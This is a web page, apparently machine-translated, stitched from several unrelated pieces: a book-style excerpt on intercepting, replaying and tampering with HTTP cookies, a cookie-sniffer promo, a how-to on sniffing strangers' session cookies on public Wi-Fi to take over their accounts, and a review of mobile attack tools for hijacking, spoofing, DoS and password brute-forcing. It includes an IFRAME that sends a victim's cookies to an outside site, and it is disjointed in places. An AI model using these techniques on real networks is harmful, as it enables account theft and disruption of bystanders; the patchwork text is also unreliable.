An easy way to steal cookies. An easy way to steal cookies Physical access to data

Youtube

Have you ever wondered how some Web sites personalize their visitors? This can be expressed, for example, in remembering the contents of the “cart” (if this node is intended for selling goods) or in the way of filling out the fields of some form. The HTTP protocol that underlies the functioning of the World Wide Web does not have the means to track events from one visit to a site to another, so a special add-on was developed to be able to store such “states”. This mechanism, described in RFC 2109, inserts special pieces of cookie data into HTTP requests and responses that allow Web sites to track their visitors.

Cookie data may be stored for the duration of the communication session ( per session), remaining in RAM for one session and being deleted when the browser is closed, or even after a specified period of time has elapsed. In other cases they are permanent ( persistent), remaining on the user's hard drive as a text file. They are usually stored in the Cookies directory (%windir%\Cookies on Win9x and %userprofile%\Cookies on NT/2000). It is not difficult to guess that after capturing cookies on the Internet, an attacker can impersonate the user of a given computer, or collect important information contained in these files. After reading the following sections, you will understand how easy it is to do.

Cookie interception

The most direct method is to intercept cookies as they are transmitted over the network. The intercepted data can then be used when logging into the appropriate server. This problem can be solved using any packet interception utility, but one of the best is Lavrenty Nikula’s program ( Laurentiu Nicula) SpyNet/PeepNet. SpyNet includes two utilities that work together. Program CaptureNet captures the packet itself and stores it on disk, and the PeepNet utility opens the file and converts it into a human-readable format. The following example is a fragment of a communication session reconstructed by PeepNet, during which the cookie serves to authenticate and control access to the pages viewed (names have been changed to maintain anonymity).

GET http://www.victim.net/images/logo.gif HTTP/1.0 Accept: */* Referrer: http://www.victim.net/ Host: www.victim.net Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

The example above shows a cookie fragment placed in an HTTP request coming to the server. The most important is the field cuid=, which specifies a unique identifier used for user authentication on the www.victim.net node. Let's say that after this the attacker visited the victim.net node, received his own identifier and a cookie (assuming that the node does not place the cookie data in virtual memory, but writes it to the hard drive). The attacker can then open his own cookie and replace the cuid= field ID with it from the captured packet. In this case, when logging into the victim.net server, he will be perceived as the user whose cookie data was intercepted.

Program ability PeepNet replaying the entire communication session or its fragment greatly facilitates the implementation of attacks of this type. Using a button Go get it! You can re-fetch the pages a user viewed using their cookie data previously captured by CaptureNet. In the PeepNet utility dialog box you can see information about someone’s completed orders. This uses cookie data intercepted by CaptureNet for authentication. Note the frame located in the lower right corner of the session data dialog box and the line that follows the Cookie: line. This is the cookie data used for authentication.

It's a pretty neat trick. In addition, the utility CaptureNet can provide a complete decrypted record of traffic, which is almost equivalent to the capabilities of professional-grade utilities such as Network Associates, Inc.'s Sniffer Pro. However, the utility SpyNet Even better - you can get it for free!

Countermeasures

You should be wary of sites that use cookies for authentication and storing sensitive identification information. One tool that can help with security is Kookaburra Software's Cookie Pal, which can be found at http://www.kburra.com/cpal.html. This software product can be configured to generate warning messages for the user when a Web site attempts to use the cookie mechanism. In this case, you can "look behind the scenes" and decide whether these actions should be allowed. Internet Explorer has a built-in cookie mechanism. To enable it, launch the Internet Options applet in Control Panel, go to the Security tab, select the Internet Zone item, set the Custom Level mode, and for permanent and temporary cookie data, set the switch to Prompt. Setting up the use of cookies in the Netscape browser is done using the command Edit › Preferences › Advanced and setting the Warn me before accepting a cookie or Disable cookies mode (Fig. 16.3). When you accept a cookie, you need to check whether it is written to disk and see if the Web site collects information about users.

When visiting a site that uses cookies for authentication, you must ensure that the username and password you initially provide are at least SSL encrypted. Then this information will appear in the PeepNet program window, at least not in the form of plain text.

The authors would prefer to avoid cookies entirely if many frequently visited Web sites did not require this option. For example, for Microsoft's worldwide popular Hotmail service, cookies are required for registration. Because this service uses several different servers during the authentication process, adding them to the Trusted Sites zone is not that easy (this process is described in the section "Using Security Zones Wisely: A Common Solution to the Activex Control Problem"). In this case, the designation *.hotmail.com will help. Cookies are not a perfect solution to the problem of HTML protocol incompleteness, but alternative approaches seem to be even worse (for example, adding an identifier to the URL, which can be stored on proxy servers). Until a better idea comes along, your only option is to control your cookies using the methods listed above.

Capture cookies via URL

Let's imagine something terrible: Internet Explorer users click on specially crafted hyperlinks and become potential victims, risking their cookies being intercepted. Bennett Haselton ( Bennett Haselton) and Jamie McCarthy ( Jamie McCarthy) from the teen organization Peacefire, which advocates for freedom of communication via the Internet, published a script that brings this idea to life. This script retrieves cookies from the client computer when its user clicks on a link contained on this page. As a result, the contents of the cookie become available to Web site operators.

This feature can be exploited for nefarious purposes by embedding IFRAME tags in the HTML of a Web page, HTML email, or newsgroup post. The following example, provided by security consultant Richard M. Smith, demonstrates the ability to use IFRAME handles with a utility developed by Peacefire.

</p><p>It is possible to craft an insidious email that would "grab" cookies from the user's hard drive and transmit them to the operators of peacefire.org. To do this, you need to place a link to this node in it many times as shown in the example. Despite the fact that the guys from Peacefire seem like pretty nice people, it’s unlikely that anyone would be happy if they got their hands on confidential data.</p> <h3>Countermeasures</h3> <p>Install the updater, which can be found at http://www.microsoft.com/technet/security/bulletin/ms00-033.asp. You can also use the program <b>Cookie Pal</b> or built-in Internet Explorer capabilities as described above.</p> <p>Have you noticed that when you return to a site that you have already visited, the site recognizes you and opens with the settings that you applied last time? Yes, and quite often? This happens thanks to cookies that store information about visitors such as login, password, session ID and other variables required to identify the visitor and display page content according to the user’s preferences chosen during the last visit to the resource. The WebCookiesSniffer program will show the user the cookies and their contents of the sites that the user is viewing in the browser.</p> <h3>View Cookies</h3> <p>You open a website and WebCookiesSniffer captures cookies in real time. The utility adds all caught cookies to a table that stores data about the host, request path, total length of the cookie file, the number of variables in the cookie file, and the Cookie itself with the names of the variables and values. WebCookiesSniffer can save the collected information about cookies to a text file. The program also has the ability to generate an HTML report for all or selected cookies. For the program to work, you must install the WinPcap driver (located in the archive along with WebCookiesSniffer). To change the language of the WebCookiesSniffer program to Russian, copy the file WebCookiesSniffer_lng.ini (also included in the archive) to the directory with the utility.</p> <h4>Screenshots of the WebCookiesSniffer program</h4> <table border="0"><tbody><tr><td> <p><img src='https://i1.wp.com/loadboard.ru/images/soft/webcookiessniffer/scr_webcookiessniffer1.png' width="100%" loading=lazy loading=lazy><br><img src='https://i1.wp.com/loadboard.ru/images/soft/webcookiessniffer/scr_webcookiessniffer2.png' width="100%" loading=lazy loading=lazy></p> </td> </tr></tbody></table><table border="0"><tbody><tr><td> <p><img src='https://i2.wp.com/loadboard.ru/images/soft/webcookiessniffer/scr_webcookiessniffer3.png' width="100%" loading=lazy loading=lazy><br><img src='https://i0.wp.com/loadboard.ru/images/soft/webcookiessniffer/scr_webcookiessniffer4.png' width="100%" loading=lazy loading=lazy></p></td></tr></tbody></table> <p>Hello, I would like to devote this short article, or rather a brief description, to the simplest way to intercept cookies on a wi-fi network. I won’t tell you here what cookies are and why they are needed, if a person is interested in intercepting “baked goods”; in a wireless network, I think he should know what it is and why he needs it. I’ll just say one thing: using these files you can gain access to other people’s accounts on various sites that require users to go through an authentication process (For example, mail.ru, vkontakte.ru, etc.).</p> <p>So let's get started. First, we need to find the wireless network itself, with an open Internet access gateway, and it is desirable that this network has quite a lot of clients. For example, any network in large shopping centers, airports, various coffee shops is suitable; in such places people usually use wi-fi Internet access to read mail, check accounts on various dating sites, view LJ and all kinds of forums. This is all exactly what we need. Having decided on the choice of network location, having studied certain hours of the maximum number of clients, let’s move on directly to combat operations. To do this, we need a laptop with a Wi-Fi adapter and a certain set of programs. In my case, I used an Acer Aspire 3610 laptop, a D-Link DWL G650 client wi-fi card and BackTrack3 OS installed.</p> <p>I advise you to use this OS, since it already includes the entire set of programs that you may need, and the most important advantage is that you do not have to install Backtrack on your hard drive, you can load this OS directly from a CD or flash drive.</p> <p>Now let's move on to the necessary software. I used kismet for network discovery, and WifiZoo for intercepting cookies. I will dwell in detail on the second program. WifiZoo is a passive broadcast scanner and collects quite a lot of useful information, such as: pop3, smtp traffic, http cookies/authinfo, msn, ftp credentials, telnet network traffic, nbt, etc. The only drawback of this program is the lack of Channel hopping mode, WifiZoo simply listens to the wireless interface, and cannot, so to speak, jump from channel to channel. But this disadvantage is compensated by another program, Kismet, which supports this mode. To start WifiZoo you will need:</p> <ul><li>python</li> <li>scapy</li> <li>Kismet</li> </ul><p>So let’s launch the program, first let’s launch Kismet to support the channel hopping mode, then launch WifiZoo directly, the following window should appear in front of you: <br></p> <p>Now all that remains is to sit and wait until you intercept something; everything that the program intercepts can be found in the logs, which are located in the directory with the program /logs/. You can also launch a GUI interface that automatically connects to http at 127.0.0.1:8000</p> <p>I won’t write about all the features of this wonderful program, I think you will figure out the other features yourself, and since at the moment we are only interested in cookies. Click on the link that says cookies and see what we intercepted: <br><br><img src='https://i1.wp.com/ergoz.ru/content/images/2018/01/skrin3kk4.png' width="100%" loading=lazy loading=lazy></p> <p>The picture shows that the cookie contains the line wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. This value is in unencrypted form in the cookie and can be easily intercepted using the Achilles utility, but in most cases in Achilles you can only see the hash of a particular entry. Before sending the request to the server, you can try to replace this line with any similar one (although in this case there is no point) - the number of attempts is not limited. Then, by sending this request to the server using the Send button, you can receive a response from the server intended for the administrator.</p> <i> </i> <p>In the previous example, you can use direct user ID spoofing. In addition, the name of the parameter, whose value substitution provides additional opportunities for the hacker, can be the following: user (for example, USER=JDOE), any expression with an ID string (for example, USER=JDOE or SESSIONID=BLAHBLAH), admin (for example, ADMIN= TRUE), session (for example, SESSION=ACTIVE), cart (for example, CART=FULL), as well as expressions such as TRUE, FALSE, ACTIVE, INACTIVE. Typically, the format of cookies is very dependent on the application for which they are used. However, these tips for finding application flaws using cookies apply to almost all formats.</p> <h2><span><b>Client-side countermeasures against cookie extraction</b> </span></h2> <p>In general, users should be wary of Web sites that use cookies for authentication and to store sensitive data. It is also necessary to remember that a Web site that uses cookies for authentication must support at least the SSL protocol to encrypt the username and password, since in the absence of this protocol, the data is transmitted unencrypted, which makes it possible to intercept it using simple software tools to view data being sent over the network.</p> <p>Kookaburra Software has developed a tool to facilitate the use of cookies. The tool is called CookiePal ( <span>http://www.kburra.com/cpal.html (see www.kburra.com)</span>). This program is designed to alert the user when a Web site tries to install a cookie on the machine, and the user can allow or deny this action. Similar cookie blocking functions are available in all browsers today.</p> <p>Another reason for regularly installing Web browser updates is that security flaws in these programs are constantly being identified. So, Bennet Haselton and Jamie McCarthy created a script that, after clicking on a link, retrieves cookies from the client's machine. As a result, all the contents of the cookies that are on the user's machine become available.</p> <p>This kind of hack can also be done using the handle <IFRAME>, embedded in the HTML text of a Web page (or in the HTML content of an email or newsgroup newsletter) to steal cookies. Consider the following example:</p> <table><tr><td class="code"> <iframe src=”http://www.peacefire.org%2fsecurity%2fiecookies%2f showcookie.html%3f.yahoo.com/”>

To ensure that such things do not threaten our personal data, I do this myself and advise everyone to always update software that works with HTML code (e-mail clients, media players, browsers, etc.).

Many people prefer to simply block cookies, but most Web sites require cookies to be browsed. Conclusion - if in the near future an innovative technology appears that allows you to do without cookies, programmers and administrators will breathe a sigh of relief, but for now cookies remain a tasty morsel for a hacker! This is true, since a better alternative does not yet exist.

Server-side countermeasures

In case of recommendations for ensuring server security, experts give one simple piece of advice: do not use the cookie mechanism unless absolutely necessary! Particular care must be taken when using cookies that remain on the user's system after the end of the communication session.

Of course, it is important to understand that cookies can be used to provide security to Web servers for user authentication. If your application does need to use cookies, you should configure the cookie mechanism to use different short-lived keys for each session, and try not to put information in these files that could be used by hackers for hacking (such as ADMIN=TRUE).

Additionally, to make your use of cookies more secure, you can use cookie encryption to prevent sensitive information from being extracted. Of course, encryption does not solve all security problems when working with cookie technology, but this method will prevent the most basic hacks described above.

“A smartphone with hacking tools? There is no such thing,” we would have told you just recently. It was possible to launch some of the usual tools for implementing attacks only on some Maemo. Now, many familiar tools have been ported to iOS and Android, and some hack-tools have been specially written for the mobile environment. Can a smartphone replace a laptop in penetration tests? We decided to check it out.

ANDROID

Android is a popular platform not only for mere mortals, but also for the right people. The number of useful ][-utilities here is simply off the charts. For this we can thank the UNIX roots of the system - this has greatly simplified the porting of many tools to Android. Unfortunately, Google does not allow some of them into the Play Store, so you will have to install the corresponding APK manually. Also, some utilities require maximum access to the system (for example, the iptables firewall), so you should take care of root access in advance. Each manufacturer uses its own technology here, but finding the necessary instructions is quite easy. A good set of HOWTOs was put together by the LifeHacker resource (bit.ly/eWgDlu). However, if you couldn’t find a particular model here, the XDA-Developers forum (www.xda-developers.com) always comes to the rescue, where you can find various information on virtually any model of Android phone. One way or another, some of the utilities described below will work without root access.

Package Manager

BotBrew Let's start the review with an unusual package manager. The developers call it “utilities for superusers,” and this is not far from the truth. After installing BotBrew, you get a repository from where you can download a huge number of familiar tools compiled for Android. Among them: Python and Ruby interpreters for running numerous tools that are written in them, a tcpdump sniffer and an Nmap scanner for network analysis, Git and Subversion for working with version control systems, and much more.

Network scanners

PIPS

An inconspicuous smartphone, which, unlike a laptop, fits easily into a pocket and never raises suspicion, can be useful for network exploration. We have already said above how you can install Nmap, but there is another option. PIPS is a port of the Nmap scanner specifically adapted for Android, albeit an unofficial one. This means you can quickly find active devices on the network, determine their OS using fingerprinting options, perform a port scan - in short, do everything that Nmap is capable of. Fing

There are two problems with using Nmap, despite all its power. Firstly, the parameters for scanning are transmitted through launch keys, which you must not only know, but also be able to enter using an inconvenient mobile keyboard. And secondly, the scanning results in the console output are not as clear as we would like. The Fing scanner does not have these shortcomings; it very quickly scans the network, does fingerprinting, and then displays in a clear form a list of all available devices, dividing them by type (router, desktop, iPhone, and so on). At the same time, for each host you can quickly view a list of open ports. Moreover, right from here you can connect, say, to FTP, using the FTP client installed in the system - very convenient. NetAudit

When it comes to analyzing a specific host, the NetAudit utility can be indispensable. It works on any Android device (even non-rooted) and allows you not only to quickly identify devices on the network, but also to examine them using a large fingerprinting database to determine the operating system, as well as CMS systems used on the web server. There are now more than 3,000 digital fingerprints in the database. Net Tools

If, on the contrary, you need to work at a lower level and carefully examine the operation of the network, then you cannot do without Net Tools. This is an indispensable set of utilities for the work of a system administrator, which allows you to fully diagnose the operation of the network to which the device is connected. The package contains more than 15 different types of programs, such as ping, traceroute, arp, dns, netstat, route.

Traffic manipulation

Shark for Root

The tcpdump-based sniffer honestly logs all data into a pcap file, which can then be studied using familiar utilities like Wireshark or Network Miner. Since no capabilities for MITM attacks are implemented in it, it is rather a tool for analyzing your traffic. For example, this is a great way to study what programs installed on your device from dubious repositories convey. FaceNiff

If we talk about combat applications for Android, then one of the most sensational is FaceNiff, which implements interception and injection into intercepted web sessions. By downloading the APK package with the program, you can run this hack tool on almost any Android smartphone and, by connecting to a wireless network, intercept accounts of a variety of services: Facebook, Twitter, VKontakte, and so on - more than ten in total. Session hijacking is carried out using the ARP spoofing attack, but the attack is only possible on unprotected connections (FaceNiff cannot wedge into SSL traffic). To curb the flow of scriptdis, the author limited the maximum number of sessions to three - then you need to contact the developer for a special activation code. DroidSheep

If the creator of FaceNiff wants money for using it, then DroidSheep is a completely free tool with the same functionality. True, you won’t find the distribution kit on the official website (this is due to Germany’s harsh laws regarding security utilities), but it can be found on the Internet without any problems. The main task of the utility is to intercept user web sessions of popular social networks, implemented using the same ARP Spoofing. But there’s a problem with secure connections: like FaceNiff, DroidSheep flatly refuses to work with the HTTPS protocol. Network Spoofer

This utility also demonstrates the insecurity of open wireless networks, but on a slightly different level. It does not intercept user sessions, but allows HTTP traffic to pass through itself using a spoofing attack, performing specified manipulations with it. Starting from ordinary pranks (replacing all the pictures on the site with trollfaces, flipping all the images or, say, replacing Google results) and ending with phishing attacks, when the user is given fake pages of such popular services as facebook.com, linkedin.com, vkontakte.ru and many others. Anti (Android Network Toolkit by zImperium LTD)

If you ask which hack utility for Android is the most powerful, then Anti probably has no competitors. This is a real hacker combine. The main task of the program is to scan the network perimeter. Next, various modules enter the battle, with the help of which a whole arsenal is implemented: eavesdropping on traffic, carrying out MITM attacks, and exploiting found vulnerabilities. True, there are also disadvantages. The first thing that catches your eye is that the exploitation of vulnerabilities is carried out only from the central program server, which is located on the Internet, as a result of which targets that do not have an external IP address can be forgotten.

Traffic tunneling

Total Commander

The well-known file manager is now on smartphones! As in the desktop version, there is a system of plugins for connecting to various network directories, as well as a canonical two-panel mode - especially convenient on tablets. SSH Tunnel

Okay, but how can you ensure the security of your data that is transmitted over an open wireless network? In addition to VPN, which Android supports out of the box, you can create an SSH tunnel. For this purpose, there is a wonderful SSH Tunnel utility, which allows you to route the traffic of selected applications or the entire system as a whole through a remote SSH server. ProxyDroid It is often necessary to send traffic through a proxy or SOX, and in this case ProxyDroid will help out. It's simple: you choose which application traffic you want to tunnel, and specify a proxy (HTTP/HTTPS/SOCKS4/SOCKS5 are supported). If authorization is required, ProxyDroid also supports this. By the way, the configuration can be linked to a specific wireless network by making different settings for each of them.

Wireless network

Wifi Analyzer The built-in wireless network manager is not very informative. If you need to quickly get a complete picture of nearby access points, then the Wifi Analyzer utility is an excellent choice. It will not only show all nearby access points, but will also display the channel on which they operate, their MAC address and, most importantly, the type of encryption used (having seen the coveted letters “WEP”, we can assume that access to the secure network is provided ). In addition, the utility is ideal if you need to find where the desired access point is physically located, thanks to a visual signal strength indicator. WiFiKill This utility, as its developer states, can be useful when the wireless network is filled to capacity with clients who use the entire channel, and it is at this moment that a good connection and stable connection is needed. WiFiKill allows you to disconnect clients from the Internet either selectively or based on a specific criterion (for example, it is possible to make fun of all the Yabloko members). The program simply performs an ARP spoofing attack and redirects all clients to themselves. This algorithm is stupidly simply implemented on the basis of iptables. This is the control panel for fast food wireless networks :).

Web application audit

HTTP Query Builder

Manipulating HTTP requests from a computer is a piece of cake; there are a huge number of utilities and browser plugins for this. In the case of a smartphone, everything is a little more complicated. HTTP Query Builder will help you send a custom HTTP request with the parameters you need, for example, the desired cookie or a changed User-Agent. The result of the request will be displayed in a standard browser. Router Brute Force ADS 2

If the site is password protected using Basic Access Authentication, then you can check its reliability using the Router Brute Force ADS 2 utility. Initially, the utility was created to brute force passwords on the router admin panel, but it is clear that it can be used against any other resource with similar protection . The utility works, but is clearly crude. For example, the developer does not provide for brute force, but only brute force using a dictionary. AnDOSid

Surely you have heard about such a sensational program for disabling web servers as Slowloris. The principle of its operation is to create and hold the maximum number of connections with a remote web server, thus preventing new clients from connecting to it. So, AnDOSid is an analogue of Slowloris right in your Android device! I'll tell you a secret, two hundred connections are enough to ensure unstable operation of every fourth website running the Apache web server. And all this - from your phone!

Various utilities

Encode

When working with many web applications and analyzing their logic, it is quite common to encounter data transmitted in encoded form, namely Base64. Encode will help you decode this data and see what exactly is stored in it. Perhaps, by substituting quotes, encoding them back into Base64 and substituting them in the URL of the site you are researching, you will get the coveted database query error. HexEditor If you need a hexadecimal editor, then there is one for Android too. With HexEditor you can edit any files, including system files, if you elevate the program's rights to superuser. An excellent replacement for a standard text editor, allowing you to easily find the desired piece of text and change it.

Remote access

ConnectBot Once you have access to a remote host, you need to be able to use it. And for this we need clients. Let's start with SSH, where ConnectBot is already the de facto standard. In addition to a convenient interface, it provides the ability to organize secure tunnels via SSH connections. PocketCloud Remote RDP/VNC

A useful program that allows you to connect to a remote desktop via RDP or VNC services. I’m very glad that these are two clients in one; there is no need to use different tools for RDP and VNC. SNMP MIB Browser

A MIB browser specially written for Android, with which you can manage network devices using the SNMP protocol. It can be useful for developing an attack vector on various routers, because the standard community string (in other words, an access password) for management via SNMP has not yet been canceled.

iOS

The iOS platform is no less popular among security utility developers. But if in the case of Android, root rights were needed only for some applications, then on Apple devices, jailbreaking is almost always required. Fortunately, even for the latest iDevices firmware (5.1.1) there is already a jailbreak tool. Along with full access, you also get an alternative application manager, Cydia, which already contains many utilities.

Working with the system

MobileTerminal

The first thing I want to start with is installing the terminal. For obvious reasons, it is not included in the standard delivery of the mobile OS, but we will need it to run console utilities, which we will discuss further. The best implementation of a terminal emulator is MobileTerminal - it supports multiple terminals, control gestures (for example, for sending Control-C) and is generally impressive in its thoughtfulness. iSSH

Another, more complex option to gain access to the device's console is to install OpenSSH on it (this is done through Cydia) and connect to it locally through an SSH client. If you use the right client like iSSH, which has amazing touch screen control, then this method is even more convenient than using MobileTerminal.

Data interception

Pirni & Pirni Pro

Now that you have access to the console, you can try the utilities. Let's start with Pirni, which went down in history as a full-fledged sniffer for iOS. Unfortunately, the structurally limited Wi-Fi module built into the device cannot be switched to the promiscuous mode necessary for normal data interception. So to intercept data, classic ARP spoofing is used, with the help of which all traffic is passed through the device itself. The standard version of the utility is launched from the console, where, in addition to the MITM attack parameters, the name of the PCAP file is specified, into which all traffic is logged. The utility has a more advanced version - Pirni Pro, which boasts a graphical interface. Moreover, it can parse HTTP traffic on the fly and even automatically extract interesting data from it (for example, logins and passwords), using regular expressions that are specified in the settings. Intercepter-NG (console edition)

The well-known sniffer Intercepter-NG, which we have written about several times, has recently had a console version. As the author says, most of the code is written in pure ANSI C, which behaves the same in almost any environment, so the console version worked from the very beginning both on desktop Windows, Linux and BSD, and on mobile platforms, including iOS and Android . The console version already implements grabbing passwords transmitted over a variety of protocols, intercepting instant messenger messages (ICQ/Jabber and many others), as well as recovering files from traffic (HTTP/FTP/IMAP/POP3/SMTP/SMB). At the same time, network scanning functions and high-quality ARP Poison are available. For correct operation, you must first install the libpcap package via Cydia (don’t forget to enable development packages in the settings). All startup instructions boil down to setting the correct rights: chmod +x intercepter_ios. Next, if you run the sniffer without parameters, a clear interactive Itercepter interface will appear, allowing you to launch any attacks. Ettercap-NG

It’s hard to believe, but this sophisticated tool for implementing MITM attacks was finally ported to iOS. After a tremendous amount of work, we managed to make a full-fledged mobile port. To save yourself from dancing with a tambourine around dependencies during self-compilation, it is better to install an already built package using Cydia, after adding theworm.altervista.org/cydia (TWRepo repository) as a data source. The kit also includes the etterlog utility, which helps to extract various types of useful information from the collected traffic dump (for example, FTP access accounts).

Wireless network analysis

WiFi Analyzer

In older versions of iOS, craftsmen ran aircrack and could break the WEP key, but we checked: the program does not work on new devices. Therefore, to study Wi-Fi, we will have to be content with only Wi-Fi scanners. WiFi Analyzer analyzes and displays information about all available 802.11 networks around you, including information about SSID, channels, vendors, MAC addresses and encryption types. The utility builds visual graphs in real time based on the data present on the air. With such a program it is easy to find the physical location of the point if you suddenly forget it, and, for example, look at the WPS PIN, which can be useful for connecting.

Network scanners

Scany What program does any pentester anywhere in the world use, regardless of goals and objectives? Network scanner. And in the case of iOS, this will most likely be the most powerful Scany toolkit. Thanks to a set of built-in utilities, you can quickly get a detailed picture of network devices and, for example, open ports. In addition, the package includes network testing utilities such as ping, traceroute, nslookup. Fing However, many people prefer Fing. The scanner has quite simple and limited functionality, but it is quite enough for the first acquaintance with the network of, say, a cafeteria :). The results display information about available services on remote machines, MAC addresses and host names connected to the scanned network. Nikto It would seem that everyone has forgotten about Nikto, but why? After all, you can easily install this web vulnerability scanner, written in a script language (namely Perl), via Cydia. This means that you can easily launch it on your jailbroken device from the terminal. Nikto will be happy to provide you with additional information on the tested web resource. In addition, you can add your own search signatures to its knowledge database with your own hands. sqlmap This powerful tool for automatically exploiting SQL vulnerabilities is written in Python, which means that once you install the interpreter, you can easily use it directly from your mobile device.

Remote control

SNMP Scan

Many network devices (including expensive routers) are managed using the SNMP protocol. This utility allows you to scan subnets for available SNMP services with pre-known community string values (in other words, standard passwords). Note that searching for SNMP services with standard community strings (public/private) in an attempt to gain access to device management is an integral part of any penetration test, along with identifying the perimeter itself and identifying services. iTap mobile RDP / iTap mobile VNC

Two utilities from the same manufacturer are designed to connect to a remote desktop using the RDP and VNC protocols. There are many similar utilities in the App Store, but these are the ones that are especially easy to use.

Password recovery

Hydra

The legendary program that helps millions of hackers around the world “remember” their password has been ported to iOS. Now you can search passwords for services such as HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 and many others directly from your iPhone. True, for a more effective attack, it is better to stock up on good brute force dictionaries. Pass Mule

Everyone knows firsthand the vulnerability of using standard passwords. Pass Mule is a kind of directory that contains all kinds of standard logins and passwords for network devices. They are conveniently organized by vendor name, product, and model, so finding the one you need won't be difficult. The program is rather designed to save time on searching for a manual for the router, the standard login and password for which you need to find out.

Exploiting vulnerabilities

Metasploit

It’s hard to imagine a more hacking utility than Metasploit, and that’s what concludes our review today. Metasploit is a package of various tools whose main task is to exploit vulnerabilities in software. Imagine: about 1000 reliable, proven and necessary exploits in the daily life of a pentester - right on your smartphone! With the help of such a tool you can really establish yourself in any network. Metasploit not only allows you to exploit flaws in server applications - tools are also available to attack client applications (for example, through the Browser Autopwn module, when a combat payload is inserted into client traffic). Here it must be said that there is no mobile version of the toolkit, however, you can install a standard package on an Apple device using .

An easy way to steal cookies. An easy way to steal cookies Physical access to data

Cookie interception

Countermeasures

Capture cookies via URL

Server-side countermeasures

ANDROID

Package Manager

Network scanners

Traffic manipulation

Traffic tunneling

Wireless network

Web application audit

Various utilities

Remote access

iOS

Working with the system

Data interception

Wireless network analysis

Network scanners

Remote control

Password recovery

Exploiting vulnerabilities

Popular articles

Latest articles

Sections

Pages

Special projects

Contacts